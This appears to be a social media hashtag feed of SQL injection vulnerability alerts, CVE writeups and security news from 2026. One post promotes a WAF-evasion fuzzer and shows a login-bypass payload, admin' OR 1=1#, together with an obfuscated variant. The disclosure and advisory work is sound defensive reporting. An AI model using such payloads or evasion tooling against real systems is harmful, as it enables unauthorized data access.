Offensive Sequence5h ago
⚠️ CVE-2026-5019: SQL injection in code-projects Simple Food Order System 1.0 (all-orders.php, Status param). MEDIUM severity, public exploit available — remote attackers at risk. Monitor and restrict exposure. https://radar.offseq.com/threat/cve-2026-5019-sql-injection-in-code-projects-simpl-bb8230db #OffSeq #SQLi #Vuln
Offensive Sequence6d ago
⚠️ HIGH severity alert: CVE-2026-2580 – SQL Injection in flippercode WP Maps plugin for WordPress (all versions). Unauthenticated attackers can exfiltrate data via 'orderby'. Patch or mitigate ASAP. https://radar.offseq.com/threat/cve-2026-2580-cwe-89-improper-neutralization-of-sp-b93f1b1b #OffSeq #WordPress #Vuln #SQLi
Offensive SequenceMar 19
🔴 CVE-2026-27413: CRITICAL Blind SQL Injection in Cozmoslabs Profile Builder Pro (≤3.13.9) allows unauthenticated data exfiltration. No patch yet — restrict access, monitor logs. Details: https://radar.offseq.com/threat/cve-2026-27413-cwe-89-improper-neutralization-of-s-2b17e884 #OffSeq #WordPress #SQLi #Infosec
DaveMar 18

Published the writeup for the authenticated SQL injection vulnerability in Kanboard - CVE-2026-33058.

https://0dave.ch/posts/cve-2026-33058/
https://www.cve.org/CVERecord?id=CVE-2026-33058
https://github.com/kanboard/kanboard/security/advisories/GHSA-f62r-m4mr-2xhh

#webappsec #cve #sqli

Kanboard CVE-2026-33058 Writeup

Walkthrough of the discovery of an authenticated SQL injection in Kanboard version <= 1.2.50 tracked as CVE-2026-33058

0dave
Offensive SequenceMar 18
🚨 CVE-2026-22730: HIGH-severity SQL injection in VMware Spring AI (1.0.x, 1.1.x) lets users with limited privileges run arbitrary SQL via MariaDBFilterExpressionConverter. Patch ASAP & harden input validation! https://radar.offseq.com/threat/cve-2026-22730-vulnerability-in-vmware-spring-ai-ddcf48d5 #OffSeq #VMware #SQLi #Infosec
The New OilMar 15

#SQLi flaw in #Elementor #Ally plugin impacts 250k+ #WordPress sites

https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/

#cybersecurity

SQLi flaw in Elementor Ally plugin impacts 250k+ WordPress sites

An SQL injection vulnerability in Ally, a WordPress plugin from Elementor for web accessibility and usability with more than 400,000 installations, could be exploited to steal sensitive data without authentication.

BleepingComputer
Offensive SequenceMar 2
🚨 CRITICAL: CVE-2026-2584 in Ciser CSIP firmware 3.0 – 5.1 enables unauthenticated SQL injection via login interface. Config data at risk — patch not yet released. Restrict access & monitor now. https://radar.offseq.com/threat/cve-2026-2584-cwe-89-improper-neutralization-of-sp-3951e11b #OffSeq #CVE20262584 #SQLi #FirmwareSecurity
Offensive SequenceFeb 17
CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
Happy Hacking SpaceFeb 11

New Tool Alert

pirebok - a guided adversarial fuzzer with evolutionary search

Give it a payload. It mutates it until it bypasses the WAF.

No wordlists. No manual tuning. 9 mutation strategies. Evolutionary search breeds payloads until they slip past classifiers.

pirebok -f GuidedRandomSqlFuzzer -p "admin' OR 1=1#"
> aDm1n'/**/oR/**/0x1=1#

pip install pirebok
github.com/HappyHackingSpace/pirebok

#infosec #waf #sqli #fuzzing #pentesting #python #opensource #HappyHackingSpace #Diyarbakir

BillFeb 11

Why

do we still

have SQL injection vulnerabilities?

I mean, comeon man.

https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html

#fortinet #sqli

Fortinet Patches Critical SQLi Flaw Enabling Unauthenticated Code Execution

Fortinet fixes critical FortiClientEMS SQL injection flaw (CVSS 9.1) enabling code execution; separate SSO bug actively exploited.

The Hacker News